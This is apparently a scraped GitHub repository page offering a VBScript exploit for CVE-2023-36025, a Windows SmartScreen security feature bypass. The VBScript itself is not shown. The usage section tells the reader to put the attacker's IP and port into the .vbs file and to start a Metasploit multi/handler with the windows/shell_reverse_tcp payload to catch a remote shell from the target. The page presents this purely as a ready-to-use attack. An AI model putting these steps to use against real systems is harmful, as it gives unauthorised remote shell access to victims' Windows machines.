coolman6942o / -EXPLOIT-CVE-2023-36025

Windows SmartScreen Security Feature Bypass Vulnerability

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

[EXPLOIT] CVE-2023-36025 - Description

Windows SmartScreen Security Feature Bypass Vulnerability

Usage

  • NOTE handler waiting for tcp request for target
  • P.S configure CVE-2023-36025.vbs file to change the ip and port to machine ip and port that is being used for the TCP handler
  • configure reverse TCP handler msfconsole use exploit/multi/handler set payload windows/shell_reverse_tcp set LHOST set LPORT run

About

Windows SmartScreen Security Feature Bypass Vulnerability


Languages

Language:VBScript 100.0%